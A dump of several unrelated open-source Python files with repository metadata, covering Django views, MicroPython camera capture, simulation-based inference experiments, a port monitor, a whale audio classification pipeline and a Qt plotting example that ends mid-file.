from rest_framework.parsers import JSONParser
from snippets.models import Snippet
from snippets.serializers import SnippetSerializer
# Create your views here.
@csrf_exempt
def snippet_list(request):
"""
List all code snippets, or create new snippet
"""
if request.method == 'GET':
snippets = Snippet.objects.all()
serializer = SnippetSerializer(snippets, many=True)
return JsonResponse(serializer.data, safe=False)
elif request.method == 'POST':
data = JSONParser().parse(request)
serializer = SnippetSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data, status=201)
return JsonResponse(serializer.errors, status=400)
@csrf_exempt
def snippet_detail(request, pk):
"""
Retrieve, update or delete a code snippet
"""
try:
snippet = Snippet.objects.get(pk=pk)
except Snippet.DoesNotExist:
return HttpResponse(status=404)
if request.method == 'GET':
serializer = SnippetSerializer(snippet)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
data = JsonResponse().parse(request)
serializer = SnippetSerializer(snippet, data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=404)
elif request.method == 'DELETE':
snippet.delete()
return HttpResponse(status=204) | [
"philbert@digitalumuganda.com"
] | philbert@digitalumuganda.com |
d17f19505910625e866744c9a735f156ba740958 | 18a0ee9af4df1673dea4aa8e6afb007aea8aea56 | /Projects/ESP32Micropython/20-12-14/webserver/imagetofile.py | 6992825e4e2c61998a1bd46865d95a6a68d92691 | [
"MIT"
] | permissive | TizioMaurizio/ArduinoWorkshop | f328fde497453919811b3621c2bffaae948ac61a | a614936f3ff8d221086eacf428f70d4502e833d7 | refs/heads/master | 2023-08-08T20:42:19.476233 | 2023-07-23T00:19:56 | 2023-07-23T00:19:56 | 209,500,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,222 | py | import camera
import os
import utime
import machine
def capture():
os.chdir('webserver')
f = open('data.jpg', 'w')
camera.init(1)
buf = camera.capture()
f.write(buf)
f.close()
f = open('data2.jpg', 'w')
buf = camera.capture()
f.write(buf)
camera.deinit()
f.close()
def capture3():
os.chdir('webserver')
f = open('data.jpg', 'w')
camera.init(1)
buf = camera.capture()
f.write(buf)
f = open('data'+str(1)'+.jpg', 'w')
buf = camera.capture()
f.write(buf)
camera.deinit()
f.close()
def capture4():
os.chdir('webserver')
camera.init(1)
for i in range(100):
f = open('frame'+str(i)+'.jpg', 'w')
buf = camera.capture()
f.write(buf)
camera.deinit()
f.close()
def capture2s():
os.chdir('webserver')
camera.init(1)
begin = utime.ticks_ms()
time = begin
prev = time
i=0
machine.sleep(500)
#while(time - begin < 2000):
#if(time - prev > -1):
prev = time
i=i+1
name = 'frame'+str(i)+'.jpg'
print(name)
f = open(name, 'w')
buf = camera.capture()
f.write(buf)
f.close()
#time = utime.ticks_ms()
camera.deinit()
| [
"maurizio.vetere@mail.polimi.it"
] | maurizio.vetere@mail.polimi.it |
ba6ca406d2ae588888b32ea75d43e5af2c5203b8 | 6f7169ca3a19b59d647b40abf339fee55c538a3d | /OnlineMovieBooking/OnlineMovieBooking/asgi.py | 9f4960d94a311c1ad1fd64aa89e8e4f9528311b5 | [] | no_license | Ajitkumar1995/Heptic_Project | 68ff9cac2844c1f80d86e3d7a574d6d1b81b56b6 | 781fc1cfd974510241dc8219fa19eca2c6332356 | refs/heads/main | 2023-05-07T06:36:50.718091 | 2021-05-24T04:30:42 | 2021-05-24T04:30:42 | 370,223,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | """
ASGI config for OnlineMovieBooking project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'OnlineMovieBooking.settings')
application = get_asgi_application()
| [
"noreply@github.com"
] | Ajitkumar1995.noreply@github.com |
e131515b865f5b46e241f0d1f1fda18484cb88c4 | b67e2546888b125701f31404f51f0b43fa98a354 | /mv_gaussian/low_dim_w_five_obs/run_script_snpe_c.py | 863ff35eac0f6ab94f824b08e671751038882e61 | [
"BSD-3-Clause",
"MIT"
] | permissive | SamuelWiqvist/snpla | a20607d8ca2dc4d74cacbc9cf14c22f58f64d501 | 9d586c5d09de3eecd2536485af6fc28a915443e4 | refs/heads/main | 2022-07-29T22:22:51.873914 | 2021-06-14T08:29:28 | 2021-06-14T08:29:28 | 337,367,769 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,193 | py | # Imports
import sys
import torch
import os
import numpy as np
import time
from torch.distributions.multivariate_normal import MultivariateNormal
from sbi.inference import SNPE_C, prepare_for_sbi
# Initial set up
lunarc = int(sys.argv[1])
dim = int(sys.argv[2])
seed = int(sys.argv[3])
seed_data = int(sys.argv[4])
hp_tuning = int(sys.argv[5]) # if hp_tuning = 0, no hyper-param tuning, else hp_tuning for that sample of the hp
# normal run: seed = 1:10, hp_tuning = 0
# hp search: seed = 11, hp_tuning = 1:10
print("Input args:")
print("Dim: " + str(dim))
print("seed: " + str(seed))
print("seed_data: " + str(seed_data))
# Set wd
print(os.getcwd())
# set the wd to the base folder for the project
if lunarc == 1:
os.chdir('/home/samwiq/snpla/seq-posterior-approx-w-nf-dev')
else:
os.chdir('/home/samuel/Documents/projects/seq posterior approx w nf/seq posterior approx w nf dev')
sys.path.append('./')
print(os.getcwd())
id_job = str(dim) + '_' + str(seed) + '_' + str(seed_data)
if hp_tuning > 0:
id_job = id_job + "_" + str(hp_tuning)
# Load all utility functions for all methods
import mv_gaussian.low_dim_w_five_obs.functions as func
print(hp_tuning)
print(func.sample_hp("snpe_c", hp_tuning))
print(torch.rand(1))
print(func.sample_hp("snpe_c", hp_tuning)[0].item())
print(torch.rand(1))
# Set model and generate data
x_o, conj_model, analytical_posterior = func.set_up_model(seed)
def simulator(theta):
N_samples = theta.shape[0]
x = torch.zeros(N_samples, conj_model.N, dim)
for i in range(N_samples):
model_tmp = MultivariateNormal(theta[i], conj_model.model.covariance_matrix)
x[i, :, :] = model_tmp.rsample(sample_shape=(conj_model.N,))
# return calc_summary_stats(x), theta #/math.sqrt(5) # div with std of prior to nomarlize data
return func.flatten(x)
# check simulator and prior
simulator, prior = prepare_for_sbi(simulator, conj_model.prior)
# function that builds the network
def build_custom_post_net(batch_theta, batch_x):
flow_lik, flow_post = func.set_up_networks()
return flow_post
inference = SNPE_C(simulator, prior, density_estimator=build_custom_post_net)
learning_rate = 0.0005 # default value
if hp_tuning > 0:
learning_rate = func.sample_hp("snl", hp_tuning)[0].item()
start = time.time()
torch.manual_seed(seed)
np.random.seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
num_rounds = 10
x_o = x_o.flatten()
posteriors = []
proposal = None
for i in range(num_rounds):
posterior = inference(num_simulations=2500, proposal=proposal, max_num_epochs=100, learning_rate=learning_rate)
posteriors.append(posterior)
proposal = posterior.set_default_x(x_o)
end = time.time()
run_time = end - start
print("")
print("Runtime:" + str(round(run_time, 2)))
kl_divs_trained = []
start = time.time()
for i in range(num_rounds):
print(i)
posterior_sample = posteriors[i].sample((1000,), x=x_o)
kl_divs_trained.append(conj_model.kl_div(analytical_posterior, posterior_sample))
if hp_tuning == 0:
np.savetxt('mv_gaussian/low_dim_w_five_obs/data/post_samples_snpec_' + str(i + 1) + "_" + id_job + '.csv',
posterior_sample.detach().numpy(), delimiter=",")
else:
np.savetxt('mv_gaussian/low_dim_w_five_obs/hp_tuning/post_samples_snpec_' + str(i + 1) + "_" + id_job + '.csv',
posterior_sample.detach().numpy(), delimiter=",")
end = time.time()
run_time_inference = (end - start) / num_rounds
# Write results
if hp_tuning == 0:
with open('mv_gaussian/low_dim_w_five_obs/results/snpec_' + id_job + '.txt', 'w') as f:
f.write('%.4f\n' % run_time)
f.write('%.4f\n' % run_time_inference)
for i in range(num_rounds):
f.write('%.4f\n' % kl_divs_trained[i])
else:
with open('mv_gaussian/low_dim_w_five_obs/hp_tuning/snpec_' + id_job + '.txt', 'w') as f:
f.write('%.4f\n' % hp_tuning)
f.write('%.6f\n' % learning_rate)
f.write('%.4f\n' % run_time)
f.write('%.4f\n' % run_time_inference)
for i in range(num_rounds):
f.write('%.4f\n' % kl_divs_trained[i])
| [
"swiqvist@gmail.com"
] | swiqvist@gmail.com |
4326b1fe39257d8c8cb75d3879444c596e400404 | a8df0f25f9d9ce3be141edb70c670b0c3e53bff2 | /1_python_basic_homework/20200714_8/1_final.py | 028a3ac98670db77b9dc805483e8077cae2eb104 | [] | no_license | IMTHERX/qytangpython | 8d99c25a68f66adf86c328ed98397bdc1a4e5992 | abfefbdaf559bcf1b9d0927480a26d1fce3aa729 | refs/heads/master | 2022-11-20T05:18:31.273526 | 2020-07-22T14:32:23 | 2020-07-22T14:32:23 | 272,198,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | #!/usr/bin/python3.6
# -*- coding=utf-8 -*-
# qytang Python V4
# WangTao
import os
import re
import time
while True:
# 输入netstat -tulnp,查看端口信息
netstat_result = os.popen('netstat -tulnp').read()
# 直接用findall检测需要的端口信息,findall比较灵活,不像match,IPv6定义需要区别处理,否则报错
# 匹配的信息,存储为(协议,端口号)
re_netstat_result = re.findall('(\S+)\s*\d{1,3}\s*\d{1,3}\s*' # 获取TCP/UDP
'\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}:(\d{1,5})\s*' #获取端口信息
'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\S+\s*'
'\w+\s*\d+\/\S+', netstat_result)
check_pro_prot = ('tcp','80') # 定义判断的基准(协议,端口号)
if check_pro_prot in re_netstat_result: # 如果(协议,端口号) = ('tcp','80') 则为真
print('HTTP(TCP/80)服务已经被打开')
break # 停止检测
else:
print('等待一秒重新开始监控!')
time.sleep(1) # 等待1秒重新检测 | [
"imtherx@foxmail.com"
] | imtherx@foxmail.com |
c8aa130be7fae098e4c52b4cee2c663da7e8857d | 50ba981bc65efea92f61c698cecfbbe3214a724e | /Django_DB_Backup/App/views.py | f634d2abf55cd3aa4e2af403c7b5c2c6d7ea4e24 | [] | no_license | shubhamjain31/demorepo | ff0a4283fc866ea94df1c340da430271daf93cb6 | 90639b8622e68155ff19bfec0bb6925b421f04cf | refs/heads/master | 2023-04-27T03:42:10.057387 | 2022-06-28T06:14:44 | 2022-06-28T06:14:44 | 229,792,545 | 1 | 0 | null | 2023-04-21T21:36:24 | 2019-12-23T17:04:22 | Python | UTF-8 | Python | false | false | 2,012 | py | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from itertools import chain
from django.contrib.auth.models import User
from django.views.decorators.csrf import csrf_exempt
from django.core import serializers
from django.contrib.admin.utils import NestedObjects
from django.core.management import call_command
import re
from App.models import *
# Create your views here.
def index(request):
return render(request, 'index.html')
def dbtable(request):
all_users = User.objects.all()
params = {'all_users':all_users}
return render(request, 'backupandrestore.html', params)
@csrf_exempt
def create_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# NestedObjects is admin contrib package which is used as a Collector subclass.
collector = NestedObjects(using="default") # database name
# create an object of NestedObjects
collector.collect([user_obj])
# create a list of all objects of all tables with foreign keys
objects = list(chain.from_iterable(collector.data.values()))
# store a data in file
with open("dbfiles/{}.json".format(user_obj.username), "w") as f:
s = serializers.serialize("json", objects, use_natural_foreign_keys=True, use_natural_primary_keys=True, indent = 4)
# make all tables objects pks null
# s = re.sub('"pk": [0-9]{1,5}', '"pk": null', s)
f.write(s)
data = {
'msg': 'Backup Created Successfully'
}
return JsonResponse(data)
@csrf_exempt
def restore_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# delete all relation of user object
Post.objects.filter(author=user_obj).delete()
Description.objects.filter(post_desc=user_obj).delete()
# file name
filename = "dbfiles/{}.json".format(user_obj.username)
# use call command for restore a data
call_command('loaddata', '{}'.format(filename))
data = {
'msg': 'Restore Backup Successfully'
}
return JsonResponse(data) | [
"sj27754@gmail.com"
] | sj27754@gmail.com |
61a1b709182ecc68826a3e0857fb7517e0aedc0f | 3ca9b9956716dd5bfa36613f36dbfe09926028aa | /venv/bin/pip | cc39fc95f9c4cdf5b33bc19223e5c45e58760789 | [] | no_license | renadh12/Scraping | 456de4fd8db1a4bd8c128b1310b42557d9524118 | 3c276d0838bf10b9a55ef70d31490c1154f21832 | refs/heads/master | 2020-12-10T03:45:33.849883 | 2020-09-02T07:25:07 | 2020-09-02T07:25:07 | 233,493,335 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 404 | #!/Users/renadhc/PycharmProjects/scraping/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"renadhc@gmail.com"
] | renadhc@gmail.com | |
fbb615f20b16ddb6c6a9e8c616808e38774076cb | a88882f03f8cf6d2099b45b293ad131b410419d7 | /plot_metric_allModels.py | 692265814c308da59be76499b60cdce472978c38 | [
"MIT"
] | permissive | gustavovaliati/pti01eval | 01a744b35d26df3837e0cdbfa735ec7bf432fac5 | 1dd27fa59b6c5569eb39c26f919a27e1a788d563 | refs/heads/master | 2021-04-15T13:38:49.846300 | 2018-04-26T16:19:44 | 2018-04-26T16:19:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,579 | py | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import datetime, os
import numpy as np
from tqdm import tqdm
from PIL import Image
from chainercv.datasets import voc_bbox_label_names
from chainercv.evaluations import eval_detection_voc, calc_detection_voc_prec_rec
from chainercv.datasets.voc import voc_utils
FASTER_RCNN_BACKUP='backups/pred_fasterrcnn_pti01_7927_20180409_225704.npy'
SSD300_BACKUP='backups/pred_ssd300_pti01_7927_20180409_231419.npy'
SSD512_BACKUP='backups/pred_ssd512_pti01_7927_20180409_224650.npy'
YOLOV2_BACKUP='backups/pred_yolov2_pti01_7927_20180407_112556.npy'
IMAGES_PATH = '/home/gustavo/workspace/bbox-grv/Images/001/'
def buildRect(b, color):
topleft_y = b[0]
topleft_x = b[1]
bottomright_y = b[2]
bottomright_x = b[3]
return patches.Rectangle((topleft_x,topleft_y),bottomright_x - topleft_x, bottomright_y - topleft_y,linewidth=1,edgecolor=color,facecolor='none')
print('Reading predictions backup...')
fr_pred_bboxes,fr_pred_labels,fr_pred_scores,fr_gt_bboxes,fr_gt_labels,fr_images = np.load(FASTER_RCNN_BACKUP)
s3_pred_bboxes,s3_pred_labels,s3_pred_scores,s3_gt_bboxes,s3_gt_labels,s3_images = np.load(SSD300_BACKUP)
s5_pred_bboxes,s5_pred_labels,s5_pred_scores,s5_gt_bboxes,s5_gt_labels,s5_images = np.load(SSD512_BACKUP)
tmp_yl_pred_bboxes,tmp_yl_pred_labels,tmp_yl_pred_scores,tmp_yl_gt_bboxes,tmp_yl_gt_labels,tmp_yl_images = np.load(YOLOV2_BACKUP)
print('Sucessfuly loaded')
print('Fixing yolo positions')
yl_pred_bboxes,yl_pred_labels,yl_pred_scores,yl_gt_bboxes,yl_gt_labels,yl_images = [],[],[],[],[],[]
for correct_index, fr_img in enumerate(fr_images):
curr_index = tmp_yl_images.tolist().index(fr_img.replace('\n',''))
yl_pred_bboxes.append(tmp_yl_pred_bboxes[curr_index])
yl_pred_labels.append(tmp_yl_pred_labels[curr_index])
yl_pred_scores.append(tmp_yl_pred_scores[curr_index])
yl_gt_bboxes.append(tmp_yl_gt_bboxes[curr_index])
yl_gt_labels.append(tmp_yl_gt_labels[curr_index])
yl_images.append(tmp_yl_images[curr_index])
print('Gerenrating plots...')
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
fig_dir = 'plottings/metrics/all_models/{}_{}_{}/'.format('PTI01', len(fr_images),now)
os.makedirs(fig_dir, exist_ok=True)
print('Saving metric in {}.'.format(fig_dir))
print('YOLOv2')
yl_prec, yl_rec = calc_detection_voc_prec_rec(
yl_pred_bboxes, yl_pred_labels, yl_pred_scores,
yl_gt_bboxes, yl_gt_labels, gt_difficults=None, iou_thresh=0.5)
yl_person_prec = yl_prec[voc_utils.voc_bbox_label_names.index('person')]
yl_person_rec = yl_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(yl_person_prec), np.average(yl_person_rec)))
plt.step(yl_person_rec, yl_person_prec, label='YOLOv2')
print('SSD512')
s5_prec, s5_rec = calc_detection_voc_prec_rec(
s5_pred_bboxes, s5_pred_labels, s5_pred_scores,
s5_gt_bboxes, s5_gt_labels, gt_difficults=None, iou_thresh=0.5)
s5_person_prec = s5_prec[voc_utils.voc_bbox_label_names.index('person')]
s5_person_rec = s5_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(s5_person_prec), np.average(s5_person_rec)))
plt.step(s5_person_rec, s5_person_prec, label='SSD512')
print('Faster R-CNN')
fr_prec, fr_rec = calc_detection_voc_prec_rec(
fr_pred_bboxes, fr_pred_labels, fr_pred_scores,
fr_gt_bboxes, fr_gt_labels, gt_difficults=None, iou_thresh=0.5)
fr_person_prec = fr_prec[voc_utils.voc_bbox_label_names.index('person')]
fr_person_rec = fr_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(fr_person_prec), np.average(fr_person_rec)))
plt.step(fr_person_rec, fr_person_prec, label='Faster R-CNN')
print('SSD300')
s3_prec, s3_rec = calc_detection_voc_prec_rec(
s3_pred_bboxes, s3_pred_labels, s3_pred_scores,
s3_gt_bboxes, s3_gt_labels, gt_difficults=None, iou_thresh=0.5)
s3_person_prec = s3_prec[voc_utils.voc_bbox_label_names.index('person')]
s3_person_rec = s3_rec[voc_utils.voc_bbox_label_names.index('person')]
print("Avg prec {}, Avg rec {}".format(np.average(s3_person_prec), np.average(s3_person_rec)))
plt.step(s3_person_rec, s3_person_prec, label='SSD300')
plt.legend()
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.ylim([0.0, 1.0])
plt.xlim([0.0, 1.0])
plt.gca().xaxis.set_major_locator(plt.MaxNLocator(10))
plt.gca().yaxis.set_major_locator(plt.MaxNLocator(10))
plt.savefig(os.path.join(fig_dir, 'recprec__precision_recall_curve.jpg'), bbox_inches='tight')
plt.show()
plt.close()
| [
"gustavovaliati@gmail.com"
] | gustavovaliati@gmail.com |
051d133913f7b59c2ae435cf1b51db34072f09c4 | b34626709275615f893ea6bf37dab47a29427e63 | /src/whales/modules/pipelines/instructions_sets.py | 59c733aee39ae4d12f352b188795890dd35a8348 | [] | no_license | sergiolib/whales-backend | 176c3995e025554ae97f880e9870edccc3ce5921 | 85709bbdc6a71f5321a53f1d129eaec15af9a067 | refs/heads/master | 2022-12-31T07:57:19.975268 | 2018-07-09T21:48:50 | 2018-07-09T21:48:50 | 303,654,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,421 | py | """Computing heavy instructions for generating step results throughout the pipeline"""
import logging
import pandas as pd
from os.path import join
from whales.modules.data_files.audio import AudioDataFile
from whales.modules.data_files.feature import FeatureDataFile
from whales.modules.pipelines import getters
class InstructionSet:
def __init__(self, logger=None):
self.logger = logger
if self.logger is None:
self.logger = logging.getLogger(self.__class__.__name__)
class SupervisedWhalesInstructionSet(InstructionSet):
def set_params(self, params: dict):
return params
def build_data_file(self, params: dict):
""""""
available_data_files = getters.get_available_data_files()
available_formatters = getters.get_available_formatters()
# Load every small input data file and concatenate all into the big data file
dfs = []
for elem in params["input_data"]:
self.logger.info(f"Loading and appending file {elem['file_name']}")
file_name = elem["file_name"]
data_file_name = elem["data_file"]
formatter_name = elem["formatter"]
df = available_data_files[data_file_name]()
fmt = available_formatters[formatter_name]()
df.load(file_name=file_name, formatter=fmt)
dfs.append(df)
big_df = AudioDataFile().concatenate(dfs)
return {"input_data": big_df}
def set_labels(self, params: dict):
labels_params = params["input_labels"]
input_data = params["input_data"]
lf = getters.get_available_labels_formatters()
for p in labels_params:
self.logger.info(f"Setting labels in file {p['labels_file']}")
file_name = p["labels_file"]
labels_formatter = lf[p["labels_formatter"]]()
input_data.load_labels(file_name, labels_formatter, label="whale")
return {}
def add_features_extractor(self, params: dict):
added_features_extractors = params.get("features_extractors", [])
added_features_extractors.append(params["features_extractor"])
return {"features_extractors": added_features_extractors}
def add_performance_indicator(self, params: dict):
added_performance_indicators = params.get("performance_indicators", [])
added_performance_indicators.append(params["performance_indicator"])
return {"performance_indicators": added_performance_indicators}
def add_pre_processing_method(self, params: dict):
added_pp_method = params.get("pre_processing_methods", [])
added_pp_method.append(params["pp_method"])
return {"pre_processing_methods": added_pp_method}
def set_machine_learning_method(self, params: dict):
return {"ml_method": params["ml_method"]}
def train_machine_learning_method(self, params: dict):
ml_method = params["ml_method"]
df = params["transformed_training_set"]
self.logger.info(f"Training method {params['ml_method'].__class__.__name__} with {len(df.data)} data points")
ml_method.parameters["data"] = df
ml_method.fit()
return {}
def save_trained_ml_method(self, params: dict):
ml_method = params["ml_method"]
dir = params["trained_models_directory"]
ml_method.save(join(dir, "ml_model.mdl"))
return {}
def train_performance_indicators(self, params: dict):
pi = params["performance_indicators"]
df = params["training_set"]
for p in pi:
self.logger.info(f"Training performance indicator {p.__class__.__name__} with {len(df.data)} data points")
p.fit(df)
return {}
def train_features(self, params: dict):
feat = params["features_extractors"]
df = params["training_set"]
for f in feat:
f.parameters["data"] = df
self.logger.info(f"Training features extractor {f.__class__.__name__} with {len(df.data)} data points")
f.fit()
return {}
def save_trained_features_extractors(self, params: dict):
feat = params["features_extractors"]
location = params["trained_models_directory"]
for i, f in enumerate(feat):
cur_loc = join(location, f'feature_{i}.mdl')
self.logger.info(f"Saving features extractor {f.__class__.__name__} to {cur_loc}")
f.save(cur_loc)
return {}
def load_trained_features_extractors(self, params: dict):
feat = params["features_extractors"]
location = params["trained_models_directory"]
for i, f in enumerate(feat):
cur_loc = join(location, f'feature_{i}.mdl')
self.logger.info(f"Loading features extractor {f.__class__.__name__} from {cur_loc}")
f.load(cur_loc)
return {}
def transform_features(self, params: dict):
feat = params["features_extractors"]
current_set = {}
transformed_set = {}
available_sets = [i
for i in params if i.endswith("_set") and not "prediction_" in i and not "transformed_" in i]
ret = {}
for s in available_sets:
df = current_set[s] = params[s]
transformed_set[s] = []
for f in feat:
f.parameters["data"] = df
msg = f"Transforming features extractor {f.__class__.__name__} with {len(df.data)} data points " \
f"for {s} set"
self.logger.info(msg)
res = f.transform()
transformed_set[s].append(res)
transformed_set[s] = FeatureDataFile().concatenate(transformed_set[s])
transformed_set[s].data.index = current_set[s].data.index
labels = current_set[s].metadata["labels"]
transformed_set[s].metadata["labels"] = labels
ret["transformed_" + s] = transformed_set[s]
return ret
def transform_pre_processing(self, params: dict):
pre_processing_methods = params["pre_processing_methods"]
input_data = params["input_data"]
data = input_data
for pp in pre_processing_methods:
pp.parameters["data"] = data
self.logger.info(f"Applying pre processing {pp.__class__.__name__} to {len(data.data)} data points")
data = pp.transform()
return {"input_data": data}
def predict_machine_learning_method(self, params: dict):
ml_method = params["ml_method"]
results = {}
available_sets = [i for i in params if i.endswith("_set") and i.startswith("transformed_")]
for dset in available_sets:
df = params[dset]
ml_method.parameters["data"] = df
msg = f"Predicting method {ml_method.__class__.__name__} to {len(df.data)} data points of {dset}"
self.logger.info(msg)
prediction = ml_method.predict()
results["prediction_" + dset] = prediction
return results
def load_trained_machine_learning_method(self, params: dict):
ml_method = params["ml_method"]
location = params["trained_models_directory"]
cur_loc = join(location, 'ml_model.mdl')
self.logger.info(f"Loading machine learning method {ml_method} from {cur_loc}")
ml_method.load(cur_loc)
return {}
def compute_performance_indicators(self, params: dict):
pi = params["performance_indicators"]
ns = params["number_of_sets"]
results = {}
available_sets = [i for i in params if i.endswith("_set") and i.startswith("transformed_")]
for dset in available_sets:
predicted_labels = None
target_labels = None
label_names = {}
for i in range(ns):
this_run_params = params[f"{i + 1}/{ns}"]
df = this_run_params[dset]
if "prediction_" + dset in this_run_params:
if predicted_labels is None:
predicted_labels = pd.Series(this_run_params["prediction_" + dset])
else:
predicted_labels = predicted_labels.append(pd.Series(this_run_params[f"prediction_" + dset]))
if "labels" in df.metadata:
if target_labels is None:
target_labels = df.metadata["labels"]
else:
target_labels = target_labels.append(df.metadata["labels"])
label_names.update(df.label_name)
for i in pi:
i.parameters = {
"target": list(map(lambda x: label_names[x], target_labels)),
"prediction": list(map(lambda x: label_names[x], predicted_labels)),
"classes": [i[1] for i in label_names.items()]
}
self.logger.info(f"Performance indicators {i.__class__.__name__} of results from {dset}")
res = i.compute()
results[f"{i.__class__.__name__}_{dset}"] = res
return results
def save_computed_performance_indicators(self, params: dict):
pi = params["performance_indicators"]
# Save methods and results
location = params["trained_models_directory"]
for i, p in enumerate(pi):
cur_loc = join(location, f'{p}')
self.logger.info(f"Saving performance indicator {p}")
p.save(cur_loc)
return {}
def save_performance_indicators_results(self, params: dict):
pi = params["performance_indicators"]
# Save methods and results
location = params["results_directory"]
for i, p in enumerate(pi):
cur_loc = join(location, f'{p}')
self.logger.info(f"Saving performance indicator {p}")
p.save_results(cur_loc)
return {}
def build_data_set(self, params: dict):
self.logger.info("Building data set")
available_data_sets = getters.get_available_data_sets()
method = params["ds_options"]["method"]
ds_cls = available_data_sets[method]
ds = ds_cls()
data_file = params["input_data"]
ds.add_data_file(data_file)
data_generator = ds.get_data_sets()
number_of_sets = ds.iterations
return {"data_generator": data_generator, "number_of_sets": number_of_sets}
def train_execute_methods(self, params: dict):
data_generator = params["data_generator"]
number_of_sets = params["number_of_sets"]
# All iterations results dictionary
results = {}
# Iterate on sets
for iteration, data in enumerate(data_generator):
training, testing, validation = data
# Set current sets
params["training_set"] = training
params["testing_set"] = testing
params["validation_set"] = validation
# Train features extractors
params.update(self.train_features(params))
# Save trained features extractors
params.update(self.save_trained_features_extractors(params))
# Transform data
params.update(self.transform_features(params))
# Train machine learning method
params.update(self.train_machine_learning_method(params))
# Train performance indicators
# params.update(self.train_performance_indicators(params))
# Predict with machine learning method
params.update(self.predict_machine_learning_method(params))
# Store results
results[f"{iteration + 1}/{number_of_sets}"] = params.copy()
# Save ml_method
params.update(self.save_trained_ml_method(params))
# Compute performance indicators
params.update(self.compute_performance_indicators({**results, **params}))
# Save performance indicators to disk
params.update(self.save_computed_performance_indicators(params))
# Save performance indicators results to disk
params.update(self.save_performance_indicators_results(params))
return results
def train_methods(self, params: dict):
data_generator = params["data_generator"]
results = dict()
# Iterate on single set
for iteration, training in enumerate(data_generator):
# Set current sets
params["training_set"] = training
# Train features extractors
params.update(self.train_features(params))
# Save trained features extractors
params.update(self.save_trained_features_extractors(params))
# Transform data
params.update(self.transform_features(params))
# Train machine learning method
params.update(self.train_machine_learning_method(params))
# Store results
results["1/1"] = params.copy()
# Save ml_method
params.update(self.save_trained_ml_method(params))
return results
def predict_methods(self, params: dict):
data_generator = params["data_generator"]
results = dict()
# Iterate on single set
for iteration, predicting_set in enumerate(data_generator):
# Set current sets
params["predicting_set"] = predicting_set
# Load trained features extractors
params.update(self.load_trained_features_extractors(params))
# Load trained machine learning method
params.update(self.load_trained_machine_learning_method(params))
# Transform data
params.update(self.transform_features(params))
# Train machine learning method
params.update(self.predict_machine_learning_method(params))
# Train performance indicators
# params.update(self.train_performance_indicators(params))
# Store results
results["1/1"] = params.copy()
# Compute performance indicators
self.compute_performance_indicators({**results, **params})
# Save performance indicators to disk
params.update(self.save_computed_performance_indicators(params))
# Save performance indicators results to disk
params.update(self.save_performance_indicators_results(params))
return results
| [
"sliberman@alges.cl"
] | sliberman@alges.cl |
84dbaf5645dcb48cc98a675f32511a1a18a0cab1 | ed029a779487f996df1ffc5873696542f084061d | /examples/chart_roi.py | ac96463c331677210d8eb973525bf159c7943c35 | [
"MIT"
] | permissive | haseeb00001/qplotutils | 1d4cee4744602d64b53398de9a81c073b203cb15 | 20156e35831608629936d0da5c9047f74ca5ccf5 | refs/heads/master | 2021-01-01T16:59:34.047898 | 2017-02-07T05:50:33 | 2017-02-07T05:50:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | #!/usr/bin/python
"""
Region of interest
------------------
Example for a region of interest (ROI) with different handles.
"""
import logging
import os
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
PKG_DIR = os.path.abspath(os.path.join(__file__, "..", ".."))
print(PKG_DIR)
if PKG_DIR not in sys.path:
sys.path.append(PKG_DIR)
from qplotutils.chart.roi import RectangularRegion, ResizeHandle, HandlePosition, RotateHandle
from qplotutils.chart.view import ChartView
__author__ = "Philipp Baust"
__copyright__ = "Copyright 2015, 2017, Philipp Baust"
__credits__ = []
__license__ = "MIT"
__version__ = "0.0.1"
__maintainer__ = "Philipp Baust"
__email__ = "philipp.baust@gmail.com"
__status__ = "Development"
_log = logging.getLogger(__name__)
_log.setLevel(logging.INFO)
if __name__ == "__main__":
""" Minimal example showing a bench with 2 docks.
The docks can be resized and dragged around.
"""
logging.basicConfig(level=logging.DEBUG)
qapp = QApplication([])
view = ChartView(orientation=ChartView.CARTESIAN)
view.setWindowTitle("ROI Test")
view.resize(500, 500)
view.setAspectRatio(1.0)
view.centralWidget.area.setRange(QRectF(-7, -7, 14, 14))
# view.visibleRegion()
view.show()
roi = RectangularRegion(1, 0, 2, 1, 0.)
roi.addHandle(ResizeHandle(roi, position=HandlePosition.TOP))
roi.addHandle(ResizeHandle(roi, position=HandlePosition.LEFT))
